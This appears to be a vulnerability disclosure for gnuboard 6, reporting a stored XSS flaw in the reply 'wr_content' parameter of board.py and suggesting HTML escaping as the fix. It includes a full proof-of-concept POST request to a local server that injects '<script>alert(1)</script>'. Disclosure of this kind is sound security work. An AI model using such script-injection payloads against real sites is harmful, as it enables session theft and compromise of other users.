Hello.

Currently, there is a writing vulnerability using the <script> tag when writing Gnubord g6 comments.

### [Name of affected Product]
gnuboard 6

### [Affected version]

https://github.com/gnuboard/g6/commit/f5dd7b84c4bc943c53c3f8b7096de508ae2e7c38

### [Vulnerability Type]
* Stored XSS

### [Affected Component]
board.py, All of posts

### [Root Cause]
* While writing reply on a post, `wr_content` parameter is not sanitized html tags, so when posting reply with a HTML tag caused Stored XSS attack.

### [Attack Vectors]

https://github.com/gnuboard/g6/assets/25397908/1eb09079-f94e-4034-842a-b50a1ae32baa

As shown in the video above, the `wr_content` web parameter can be arbitrarily modified using HTML tags when writing, and when the `<script>` tag is inserted, a Stored XSS attack is normally possible.

It seems necessary to check and modify the script tag directly within the `write_update` function in `board.py` or to process HTML escaping.

The below is the PoC Web request.

```
POST /board/write_update/free? HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 1792
Cache-Control: max-age=0
sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:8000
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySgFBdm7sWhgsJGVH
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.199 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:8000/board/write/free
Accept-Encoding: gzip, deflate, br
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: ck_visit_ip=127.0.0.1; session=eyJpc19tb2JpbGUiOiBmYWxzZSwgInNzX3Rva2VuIjogIjhkNzgyMWMwZGI5MzUzZjg4MWFkOTRkZDVmZjJiYzhkIn0=.ZahUdQ.BiPBCxMiQMixJW06yEnmBeE4zGw
Connection: close

------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="uid"

2024011717272327
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_id"


------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="parent_id"


------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="token"

8d7821c0db9353f881ad94dd5ff2bc8d
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_name"

test
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_password"

tes
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_email"

ttes@naver.com
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_homepage"

tetest
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="html"

html1
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_subject"

set
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_content"

<p>settt</p><script>alert(1)</script>

------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="option"

html2
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_link1"


------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_link2"


------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="bf_file[]"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="bf_file[]"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundarySgFBdm7sWhgsJGVH--
```